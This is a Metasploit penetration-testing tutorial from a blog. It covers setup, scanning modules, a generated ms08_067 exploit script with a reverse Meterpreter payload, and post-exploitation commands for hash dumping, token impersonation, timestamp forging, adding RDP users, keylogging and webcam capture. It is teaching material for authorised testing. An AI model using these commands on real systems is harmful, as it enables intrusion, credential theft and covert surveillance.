Kali's msf penetration test

1. Metasploit introduction, installation, update, directory structure

1. Introduction to Metasploit

Metasploit, in full The Metasploit Framework (MSF), is an open-source exploitation framework that can be downloaded and used free of charge. It lets you obtain, develop and run exploits for known software vulnerabilities from one console, and it ships with more than 2000 professional-grade exploit and auxiliary modules.

2. MSF installation requirements

Hard disk space:
At least 10 GB, 50 GB recommended. Use an NTFS or EXT3/EXT4 partition rather than FAT32: FAT32 cannot hold files larger than 4 GB, which rules out many virtual machine images.

Memory:
2 GB or more is recommended.

Processor:
Requirements are low; any current machine is enough (anything faster than 500 MHz will do).

Network equipment:
The virtual machine can be bridged, or you can configure the IP address yourself. For wireless testing an external wireless adapter is needed, because a virtual machine cannot drive the host's built-in Wi-Fi card directly.

Software:
Kali and the target systems to be tested.

Virtual machine:
Essential: Kali and the various target systems are installed as virtual machines.

Kali:
Download link: http://www.kali.org/downloads/
Upgrade command: "apt-get update && apt-get upgrade" (on current Kali, "apt update && apt full-upgrade" is the recommended form).

Metasploitable system:
A deliberately vulnerable Linux system with many large and small vulnerabilities, very suitable as a practice target. Never expose it to an untrusted network.
Download address: https://sourceforge.net/projects/metasploitable/files/Metasploitable2/
The download is a zip file; unzip it and open the contained virtual machine with VMware.

3. MSF update

1. Replace the apt source, commenting out the original source with #.
vi /etc/apt/sources.list
# Official Kali source
#deb http://http.kali.org/ kali-rolling main non-free contrib
#deb-src http://http.kali.org/ kali-rolling main non-free contrib
# USTC mirror
deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
Save and exit.

Note (saving and exiting in vi)
Press ESC to return to command mode, then:
:w        save the file without exiting vi
:w file   write the changes to another file, without exiting vi
:w!       force save, without exiting vi
:wq       save the file and exit vi
:wq!      force save the file and exit vi
:q        exit vi without saving (refused if there are unsaved changes)
:q!       discard changes and force quit vi
:e!       discard all changes and reload the file from the last save
2. Add the archive signing key
wget archive.kali.org/archive-key.asc   //Download the key
apt-key add archive-key.asc             //Install the key
Note: apt-key is deprecated on current Kali; the key ships in the kali-archive-keyring package and is kept current with "apt install kali-archive-keyring". Compare the fingerprint with the one published on kali.org before trusting a key you downloaded.
If installation still fails after adding the key, remove the packaged msf first and reinstall it:
root@kali:~# apt remove metasploit-framework
Note: if the uninstall reports "Could not get lock /var/cache/apt/archives/lock (11: Resource temporarily unavailable)", another apt or dpkg process holds the lock. Let it finish, or confirm nothing is running (ps -ef | grep -E 'apt|dpkg') before removing the lock file:
root@kali:~# sudo rm /var/cache/apt/archives/lock   //Force unlock; only when no apt/dpkg process is running

3. Install the msf framework
root@kali:~# apt-get update
root@kali:~# apt-get install metasploit-framework   //Install the msf framework
root@kali:~# msfconsole   //If it warns that the database is not connected, exit msf and start the database
root@kali:~# systemctl start postgresql    //Start the database
root@kali:~# systemctl enable postgresql   //Start it automatically at boot
root@kali:~# msfdb init   //Create the database, the msf database user and the module cache
root@kali:~# msfconsole
Note
If, after updating msf, msfconsole fails with:
root@kali:~# msfconsole
[-] Bundler failed to load and returned this error:
    'cannot load such file -- bundler/setup'
[-] You may need to uninstall or upgrade bundler
Solution:
root@kali:~# sudo gem install bundler
root@kali:~# bundle update celluloid

4. MSF directory structure

On BackTrack 5, MSF is stored in /opt/MSF.

On Kali, the framework lives in
/usr/share/metasploit-framework/

Almost all modules of every kind are under
cd /usr/share/metasploit-framework/modules

auxiliary
Mainly auxiliary scripts used during a penetration test: scanning, sniffing, cracking, injection, vulnerability discovery and so on. They do not deliver a payload.

encoders
Encoders transform a payload so that it no longer contains forbidden bytes and is harder to match with a static signature. They help against simple filters and signature-based detection, not against modern endpoint protection.

exploits
Exploits, 0days and other exploit scripts; the actual attack code lives here.
Naming rule: system/service/module. When using an exploit you can follow this naming scheme to find it,
for example: use exploit/windows(system)/vnc(service)/realvnc_client(module name)

nops
NOP generators: they produce the padding ("NOP sled") placed in front of shellcode, and can vary it so that fixed NOP patterns do not trigger IDS/IPS signatures.

payloads
The code the attacker sends to the target system for execution after a successful exploit.
Naming rule: system/type/name, for example: use payload/windows/shell/bind_tcp
The difference between payloads and exploits: the payload runs on the target machine, while the exploit is run from the attacker's machine.

post
Post-exploitation modules run against the target after an exploit has succeeded, such as privilege escalation and hash dumping.

data
Binaries and data used by other modules: Meterpreter, PassiveX, VNC, DLLs, user-interface code and data files for the web interface.

plugins
Plugins are loaded on demand with the load command and extend the console, for example database connection plugins.

scripts
Most files here are scripts run by the Meterpreter module.

tools
Useful scripts and assorted stand-alone tools.

2. MSF technical terminology explanation

1. Exploit (penetration attack)

An exploit is an attack in which an attacker or penetration tester takes advantage of a security vulnerability in a system, application or service.
Common attack techniques include buffer overflows, web application vulnerability attacks and the abuse of configuration errors.

2. Payload (attack payload)

The payload is the code we want the target system to execute once it has been compromised. In MSF it can be freely chosen, delivered and planted independently of the exploit. For example, a reverse shell is a payload that opens a network connection from the target host back to the attacking host and provides a command-line shell. A bind shell payload binds a command-line shell to a listening port on the target host, and the attacker connects to that port to interact with the shell. Reverse shells are usually preferred because outbound connections pass through most firewalls and NAT, while a bind shell needs an inbound port that the attacker can reach.

3. Shellcode

Shellcode is the set of machine instructions that runs as the payload during an exploit. It is usually written in assembly. In most cases the target system provides a command-line shell or a Meterpreter shell after the shellcode executes, which is where the name comes from.

4. Module

In MSF a module is a self-contained piece of code used inside the framework. Sometimes you use an exploit module, the component that actually launches the attack; at other times an auxiliary module, for example to scan or fingerprint a system.

5. Listener

The listener is the MSF component that waits for incoming network connections. For example, after the target host has been compromised it may connect back to the attacking host over the Internet; the listener waits on the attacking host for that connection and then handles it.

3. MSF basic commands

? or help   Show the help menu listing all commands
msfconsole   Open the console
search   Search for a command or module, for example: search ms08-067
use   Select a module, for example: use exploit/windows/smb/ms08_067_netapi
back   Leave the current module context
info   Show module information, for example: info exploit/windows/smb/ms08_067_netapi
check   Test whether the target is vulnerable without exploiting it (only for modules that implement a check)
banner   Display the MSF banner and version information
connect <host> <port>   Connect to a host, like a small netcat, for example: connect www.baidu.com 80
exit / quit   Exit the console
irb   Enter the interactive Ruby shell
jobs   Display and manage background jobs (like the task manager in Windows)
kill   Kill a job (like ending a process)
loadpath   Load modules from an additional path
load   Load a plugin
resource   Run the commands stored in a file
route   View and manage routes through sessions (pivoting)
save   Save the current settings
set   Assign a value to a variable, for example: set RHOST 192.168.1.0
show   Show modules of a given type or the current module's settings, for example: show options
setg   Assign a value to a global variable
   For example, an IP set with setg is used as RHOST in other modules too
sleep   Do nothing for the given number of seconds
unload   Unload a plugin
unset   Unset one or more variables, for example: unset rhost
unsetg   Unset one or more global variables
version   Display the version of MSF and the console libraries

4. Exploits and payloads modules

1. exploits module

Naming rule: system/service/name
For example: windows/smb/ms08_067_netapi

RHOST: target host IP address, for example: set rhost 192.168.0.1 (current versions use RHOSTS for exploits too, and accept a range or a file of targets)
RPORT: target host port, for example: set rport 80
LHOST: attacker's IP address, for example: set lhost 192.168.0.1 (the address the target can actually reach, which is not always the primary interface)
LPORT: attacker's port, for example: set lport 80
PAYLOAD: the payload that runs after success and returns a shell, for example: set payload windows/meterpreter/bind_tcp

2. payloads module

A payload is chosen after a module has been selected with use.
Naming rule: system/type/name
For example: windows/dllinject/reverse_tcp
type naming rule
shell: a plain command shell.
dllinject: inject a DLL into a process.
patchup*: alternative ("patched-up") variants of the dllinject and meterpreter stages.
upexec: upload and execute a file.
meterpreter: advanced in-memory payload.
vncinject: inject a VNC server for a graphical session.
passive: PassiveX, which tunnels through an ActiveX control in Internet Explorer.
name naming rule
shell_find_tag: create a shell on the already established connection.
shell_reverse_tcp: connect back to the attacker's host and create a shell.
bind_tcp: listen on a TCP port on the target and wait for the attacker to connect.
reverse_tcp: connect back to the attacker over TCP.
reverse_http: connect back over an HTTP tunnel.
add_user: create a new user and add it to the administrators group.
xxx_ipv6_tcp: IPv6 transport.
xxx_nonx_tcp: works on systems with NX/DEP enabled (NX is a CPU feature that marks memory pages non-executable so injected code in data areas cannot run).
xxx_ord_tcp: ordinal-based stager (resolves socket functions by ordinal, giving a smaller payload).
xxx_tcp_allports: try every possible port for the connect-back until one gets out.

5. The simple and basic use process of MSF:

Type msfconsole in the Kali terminal to start MSF.

search + vulnerability number: find the vulnerability; the output lists the matching exploit modules.

use + module path: enter the module.

info: view details about the exploit (author, targets that can be attacked, references and so on).

show options: see what needs to be set, such as the target IP address, the port number and so on.

set: configure the module according to the output of show options,
for example: set payload, set rhost/rport, set lhost/lport, set target and so on.
check: test whether the target is vulnerable (when the module supports it).
exploit or run: launch the attack.
Check the result with sessions -l; if a session is listed, the attack succeeded, and sessions -i <id> interacts with it.
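The workflow above can be scripted instead of typed, which makes a run repeatable and reviewable. The following is an added example, not part of the original post: two POSIX shell functions, is_ipv4 and build_rc (names chosen here), that validate the addresses and emit an msfconsole resource script for the page's ms08_067_netapi walkthrough. The addresses in the usage line are placeholders; current Metasploit versions take RHOSTS for exploit modules, which is what the script sets.

```shell
#!/bin/sh
# Added example, not from the original post: turn the manual search/use/set/exploit
# sequence into an msfconsole resource script so a run is repeatable and reviewable.
# Assumptions: the module and options are the page's ms08_067_netapi walkthrough;
# the IP addresses in the usage line are constructed placeholders, not real hosts.

# is_ipv4 ADDR -> returns 0 if ADDR is a dotted quad with every octet in 0..255
is_ipv4() {
    printf '%s\n' "$1" | awk -F. '
        NF != 4 { exit 1 }
        { for (i = 1; i <= 4; i++) if ($i !~ /^[0-9]+$/ || $i + 0 > 255) exit 1 }
        { exit 0 }'
}

# build_rc RHOSTS LHOST LPORT [PAYLOAD] -> prints the resource script on stdout,
# refusing to emit anything if an address or port is malformed
build_rc() {
    _rhosts=$1; _lhost=$2; _lport=$3; _payload=${4:-windows/meterpreter/reverse_tcp}
    is_ipv4 "$_rhosts" || { echo "bad RHOSTS: $_rhosts" >&2; return 1; }
    is_ipv4 "$_lhost"  || { echo "bad LHOST: $_lhost" >&2; return 1; }
    case $_lport in ''|*[!0-9]*) echo "bad LPORT: $_lport" >&2; return 1 ;; esac
    [ "$_lport" -ge 1 ] && [ "$_lport" -le 65535 ] || { echo "bad LPORT: $_lport" >&2; return 1; }
    cat <<EOF
# generated for an authorised test of $_rhosts
use exploit/windows/smb/ms08_067_netapi
set RHOSTS $_rhosts
set PAYLOAD $_payload
set LHOST $_lhost
set LPORT $_lport
check
exploit -j -z
sessions -l
EOF
}

# Usage: write the script, then run it non-interactively with msfconsole.
#   build_rc 192.168.1.100 192.168.1.50 4444 > ms08_067.rc && msfconsole -q -r ms08_067.rc
```

The generated file is plain text, so it can be checked into the engagement notes and diffed later; exploit -j -z backgrounds the job without dropping into the session, and sessions -l then shows whether it worked.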

6. MSF auxiliary module

1. Auxiliary module

1. Whois information gathering:

whois is an ordinary system command rather than an MSF module, but it is the usual first step.
View domain name information
whois www.baidu.com
View IP address information
whois 192.168.1.100

2. Use an auxiliary module to find e-mail addresses

use auxiliary/gather/search_email_collector   enter the e-mail search module

show options   see what needs to be set

set domain baidu.com   set the domain name (the bare domain, not a host name such as www.baidu.com)

set search_google false   Google is blocked in China, so that search engine is disabled

run

3. Use the DNS enumeration module under auxiliary:

use auxiliary/gather/enum_dns   enter the DNS enumeration module

show options   see what needs to be set

set domain baidu.com   set the domain name
Note: set the registered domain and do not add www, otherwise brute forcing will produce names like xxx.www.baidu.com

run

4. Port scanning module

1. Built-in nmap scan
nmap -sV 192.168.1.100   (inside msfconsole, db_nmap runs the same scan and stores the results in the database)

2. SYN scan
use auxiliary/scanner/portscan/syn   enter the SYN scan module

show options   see what needs to be set

set RHOSTS 192.168.1.100   set the target address (scanner modules take RHOSTS, which may be a range)

set threads 100   set the number of threads (default is 1; 100 here)

run
Scanning principle:
The scanner sends a SYN packet to a port on the target host. When the SYN/ACK comes back, the scanner does not reply with ACK but sends RST, tearing the half-open connection down. The three-way handshake is never completed and no TCP connection is established, so the listening application never receives the connection and writes nothing to its logs. That is why the technique is called half-open or "stealth" scanning. It is only stealthy against application logs: a host firewall, an IDS or a packet capture sees every SYN and RST, and a burst of SYNs to many ports from one source is an easy signature. Sending raw SYN packets requires root privileges.

TCP connect scan, server and client establish a full connection (the target port is open):
① Client sends SYN;
② Server returns SYN/ACK, indicating that the port is open;
③ Client returns ACK, and the connection is established;
④ Client actively closes the connection.

TCP connect scan, the connection fails (the target port is closed):
① Client sends SYN;
② Server returns RST/ACK, indicating that the port is closed.

SYN scan, port open:
1. Client sends SYN;
2. Server sends SYN/ACK;
3. Client sends RST to tear the connection down (the first two steps are already enough to know the port is open).
SYN scan, port closed:
1. Client sends SYN;
2. Server replies with RST (the port is closed).
No reply at all, or an ICMP unreachable, means the port is filtered.

Advantages:
SYN scanning is less visible than TCP connect() scanning. It only needs to send the initial SYN packet: if the port is open a SYN/ACK comes back, if it is closed an RST comes back, and in neither case is a full connection handed to the application.
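From the defender's side the same rules can be read off a packet capture. The following is an added example, not part of the original post: POSIX shell/awk functions (sample_capture, syn_scan_verdicts and syn_scan_sources, all names chosen here) that take tcpdump-style lines, constructed inline with placeholder addresses, and report the state of every port the target answered plus any source that SYN-probed more distinct host:port pairs than a threshold.

```shell
#!/bin/sh
# Added example, not from the original post. Reads tcpdump-style text lines and applies
# the SYN-scan rules above: SYN/ACK from the target = open, RST from the target = closed.
# The capture below is constructed, with placeholder addresses, so everything runs offline.

# sample_capture -> prints a constructed tcpdump-style capture of a SYN scan
#   (scanner 192.168.1.50, target 192.168.1.100; port 3389 never answers, i.e. filtered)
sample_capture() {
    cat <<'EOF'
12:00:01.000001 IP 192.168.1.50.40001 > 192.168.1.100.22: Flags [S], seq 1, win 1024, length 0
12:00:01.000002 IP 192.168.1.100.22 > 192.168.1.50.40001: Flags [S.], seq 2, ack 2, win 29200, length 0
12:00:01.000003 IP 192.168.1.50.40001 > 192.168.1.100.22: Flags [R], seq 2, win 0, length 0
12:00:01.000004 IP 192.168.1.50.40002 > 192.168.1.100.23: Flags [S], seq 1, win 1024, length 0
12:00:01.000005 IP 192.168.1.100.23 > 192.168.1.50.40002: Flags [R.], seq 0, ack 2, win 0, length 0
12:00:01.000006 IP 192.168.1.50.40003 > 192.168.1.100.80: Flags [S], seq 1, win 1024, length 0
12:00:01.000007 IP 192.168.1.100.80 > 192.168.1.50.40003: Flags [S.], seq 9, ack 2, win 29200, length 0
12:00:01.000008 IP 192.168.1.50.40003 > 192.168.1.100.80: Flags [R], seq 2, win 0, length 0
12:00:01.000009 IP 192.168.1.50.40004 > 192.168.1.100.445: Flags [S], seq 1, win 1024, length 0
12:00:01.000010 IP 192.168.1.100.445 > 192.168.1.50.40004: Flags [R.], seq 0, ack 2, win 0, length 0
12:00:01.000011 IP 192.168.1.50.40005 > 192.168.1.100.3389: Flags [S], seq 1, win 1024, length 0
EOF
}

# syn_scan_verdicts TARGET_IP < capture -> one "port state" line per port the target answered;
# ports with no reply are absent, which is exactly what "filtered" looks like on the wire
syn_scan_verdicts() {
    awk -v target="$1" '
        $2 == "IP" && $6 == "Flags" {
            src = $3
            n = split(src, part, ".")                 # last dotted component is the port
            sport = part[n]
            shost = substr(src, 1, length(src) - length(sport) - 1)
            flags = $7; gsub(/[][,]/, "", flags)      # "[S.]," -> "S."
            if (shost == target) {                    # only replies from the target carry a verdict
                if (flags ~ /S/ && flags ~ /\./) state[sport] = "open"
                else if (flags ~ /R/)               state[sport] = "closed"
            }
        }
        END { for (p in state) print p, state[p] }
    ' | sort -n
}

# syn_scan_sources THRESHOLD < capture -> "srcip nports" for every source that sent a bare
# SYN to more than THRESHOLD distinct host:port pairs (a crude scan detector)
syn_scan_sources() {
    awk -v thr="$1" '
        $2 == "IP" && $6 == "Flags" && $7 == "[S]," {
            n = split($3, part, ".")
            shost = substr($3, 1, length($3) - length(part[n]) - 1)
            dst = $5; sub(/:$/, "", dst)
            key = shost SUBSEP dst
            if (!(key in seen)) { seen[key] = 1; count[shost]++ }
        }
        END { for (h in count) if (count[h] > thr) print h, count[h] }
    '
}

# Usage against a live capture (run as root, one line per packet):
#   tcpdump -nn -l 'tcp[tcpflags] & (tcp-syn|tcp-rst) != 0' | syn_scan_sources 20
```

The detector counts only bare SYNs, so a normal client that completes handshakes to a few services never crosses the threshold, while a half-open scanner sweeping many ports does; that asymmetry is the whole point of the "not logged by the application, but obvious on the wire" caveat above.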

3. TCP connect scan
use auxiliary/scanner/portscan/tcp   enter the TCP scan module (a full connect scan: no root needed, but the connections do show up in application logs)

show options   see what needs to be set

set RHOSTS 192.168.1.100   set the target address

set threads 100   set the number of threads (default is 1; 100 here)

run

5. Service version information detection

1. SMB version scan
use auxiliary/scanner/smb/smb_version   enter the SMB version scan

show options   see what needs to be set

set RHOSTS 192.168.1.100   set the target address

run
2. SSH version scan
use auxiliary/scanner/ssh/ssh_version   enter the SSH version scan

show options   see what needs to be set

set RHOSTS 192.168.1.100   set the target address

set threads 100   set the number of threads (default is 1; 100 here)

run
3. FTP version scan
use auxiliary/scanner/ftp/ftp_version   enter the FTP version scan

show options   see what needs to be set

set RHOSTS 192.168.1.100   set the target address

set threads 100   set the number of threads (default is 1; 100 here)

run

7. Post-exploitation with Meterpreter

1: Upload a file to the Windows host.
Any file on the attacking machine can be uploaded to the remote target host.
Command:
upload <file> <destination>
Note: the -r option uploads directories and files recursively.
Correct form: upload /root/123.exe C:\\123.exe (backslashes in the Windows path must be doubled).

2: Download a file from the Windows host.
The download command fetches a file from the remote host.
Command:
download <file> <path to save to>
Note: Windows paths should use doubled backslashes.
To recursively download an entire directory including sub-directories and files, use download -r.

3: Execute an exe file on the target host.
The execute command runs an application on the target host. The syntax is simple.
Command:
execute -f <path> [options]
Correct form: execute -f C:\\1.exe

4: Create a new channel for CMD
To run a command prompt on the target host:
Command:
execute -f cmd.exe -c
(-c creates a channel for the process's input and output so you can interact with it from Meterpreter.)

5: Display processes
The ps command lists all running processes on the target host.
Command:
ps

6: Get a cmd shell on the target host
Drop into a native command shell on the target:
Command:
shell

7: Obtain SYSTEM privileges.
The getsystem command tries several techniques to elevate to the local SYSTEM account. It needs local administrator rights to begin with; from an ordinary user it fails and a separate privilege escalation is required first.
Command:
getsystem

8: Use hashdump to dump all password hashes
From the Meterpreter shell we can dump the account names and password hashes of the target system (SYSTEM privileges are required). The output is in LM/NTLM hash format, and there are many tools and techniques for cracking them.
NTLM online cracking: https://hashkiller.co.uk/ntlm-decrypter.aspx (never submit hashes from a client engagement to a third-party site; crack them offline with john or hashcat instead)
Command:
hashdump
Each output line has the form:
Username:RID:LM hash:NTLM hash:::
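Before feeding hashdump output to a cracker it is worth triaging it. The following is an added example, not part of the original post: POSIX shell/awk functions (sample_hashdump, hashdump_triage and hashdump_to_hashcat, names chosen here) that validate each line, flag accounts whose LM hash is still stored or whose NT hash is the empty-password value, and emit user:hash pairs for hashcat mode 1000. The sample lines are constructed; the hash values are the well-known ones for an empty string and for the word "password".

```shell
#!/bin/sh
# Added example, not from the original post: triage hashdump output offline before
# cracking. The sample lines are constructed; the hashes are the well-known values for
# an empty LM hash, an empty NT hash, and the LM/NT hashes of the string "password".

EMPTY_LM=aad3b435b51404eeaad3b435b51404ee   # LM hash of the empty string (LM storage disabled)
EMPTY_NT=31d6cfe0d16ae931b73c59d7e0c089c0   # NT hash of the empty string (blank password)

# sample_hashdump -> prints constructed hashdump output, including a non-hash status line
sample_hashdump() {
    cat <<'EOF'
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
alice:1001:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
bob:1002:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
[*] Dumping password hashes...
EOF
}

# hashdump_triage < hashdump lines -> "user rid lm_stored=yes|no blank_password=yes|no"
# for each well-formed line. A stored LM hash (anything but the empty value) means the
# password is at most 14 characters and trivially recoverable; an empty NT hash means a
# blank password. Status lines and malformed lines are dropped rather than guessed at.
hashdump_triage() {
    awk -F: -v elm="$EMPTY_LM" -v ent="$EMPTY_NT" '
        NF == 7 && length($3) == 32 && $3 ~ /^[0-9a-f]+$/ && length($4) == 32 && $4 ~ /^[0-9a-f]+$/ {
            lm = ($3 == elm) ? "no" : "yes"
            nt = ($4 == ent) ? "yes" : "no"
            print $1, $2, "lm_stored=" lm, "blank_password=" nt
        }'
}

# hashdump_to_hashcat < hashdump lines -> "user:nthash" for accounts that actually have a
# password, ready for: hashcat -m 1000 --username hashes.txt wordlist
hashdump_to_hashcat() {
    awk -F: -v ent="$EMPTY_NT" '
        NF == 7 && length($4) == 32 && $4 ~ /^[0-9a-f]+$/ && $4 != ent { print $1 ":" $4 }'
}

# Usage on a real dump saved from the Meterpreter session:
#   hashdump_triage < hashdump.txt
#   hashdump_to_hashcat < hashdump.txt > hashes.txt
```

Skipping blank-password accounts keeps the cracking run honest (they need no cracking, they need reporting), and the LM flag is usually the finding worth writing up, since it means the host still stores the legacy hash that rainbow tables break in minutes.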

9: Use credential_collector to dump hashes and tokens.
A similar post module, credential_collector, also gathers the password hashes and access tokens present on the target host.
Command:
run credcollect   (older versions; on current versions: run post/windows/gather/credentials/credential_collector)

10: Create a port forward
The portfwd command in the Meterpreter shell is one of the most used pivoting commands: it lets the attacking system reach ports that are not directly routable to it, through the compromised host.
The add option adds a port forward to the list and essentially creates a tunnel.
Note: this tunnel exists outside the Meterpreter console and can be used by any local program.
Command:
portfwd add -l 6666 -p 3389 -r 127.0.0.1   #forward the target's port 3389 (127.0.0.1 as seen from the compromised host) to local port 6666

rdesktop 127.0.0.1:6666

11: Delete a port forward
The counterpart of the create command; it removes one forwarding entry.
Command:
portfwd delete -l <local port> -p <remote port> -r <remote host>
for example: portfwd delete -l 1337 -p 1337 -r 192.168.1.100

To list all forwarding entries use portfwd list; to delete all of them use portfwd flush.
12: Search for files on the target host.
The search command locates specific files on the target host, either across the entire file system or within a given folder (-d).
For example, to find all txt files on the target host:
Command:
search -f *.txt

13: Get the user ID
The getuid command shows the user that the Meterpreter process is running as on the host.
Command:
getuid

14: Get system information
The sysinfo command shows the computer name, operating system, architecture and language.
Command:
sysinfo

15: Impersonate any user (token manipulation)
Impersonating a user's token is very useful against distributed systems such as Microsoft Active Directory: local access on one machine is of limited value on its own, but the credentials found there, especially administrative ones, unlock the rest of the domain.
Incognito was originally a stand-alone application used after compromising a system to impersonate user tokens. It was later integrated into Metasploit and finally into Meterpreter. Usage:
Loading the module in a Meterpreter session is simple: enter load incognito (older versions accept use incognito).
list_tokens -u shows all available user tokens.
Then impersonate a token to obtain its privileges. After a token has been impersonated successfully, getuid shows the new identity.

getuid
load incognito
list_tokens -u
impersonate_token "Machine\user"
Tokens exist only for users who currently have a logon session or process on this host, and listing tokens other than your own requires SYSTEM.

16: Webcam commands
webcam_list   list the cameras
webcam_snap   take a picture with the camera
webcam_stream   start streaming video from the camera

17: execute, run a file
execute runs a file on the target machine
execute -H -i -f cmd.exe   creates a new cmd.exe process; -H makes it hidden, -i makes it interactive

18: timestomp, forge timestamps
timestomp -h   view help
timestomp C:\\2.txt -v   view the timestamps (MACE values) of 2.txt
timestomp C:\\2.txt -f C:\\1.txt   copy the timestamps of 1.txt onto 2.txt
Note: timestomp rewrites the $STANDARD_INFORMATION timestamps; forensic tools compare them with the $FILE_NAME attribute and will flag the mismatch.

19: enable_rdp script, enable 3389
run post/windows/manage/enable_rdp   enable Remote Desktop
run post/windows/manage/enable_rdp USERNAME=www2 PASSWORD=123456   also add a user
run post/windows/manage/enable_rdp FORWARD=true LPORT=6662   forward port 3389 to local port 6662
The script is located at /usr/share/metasploit-framework/modules/post/windows/manage/enable_rdp.rb
Reading enable_rdp.rb shows how it works: RDP is enabled by modifying the registry through reg; the user is added by calling net user through cmd.exe; port forwarding uses the portfwd command. Each of these leaves a visible trace (registry change, new local account, event log entries), so clean up after the engagement.

20: Keylogger
keyscan_start   start the keylogger
keyscan_dump    export the recorded keystrokes
keyscan_stop    stop the keylogger

For other details, see: https://xz.aliyun.com/t/2536

Origin blog.csdn.net/weixin_45380284/article/details/107270192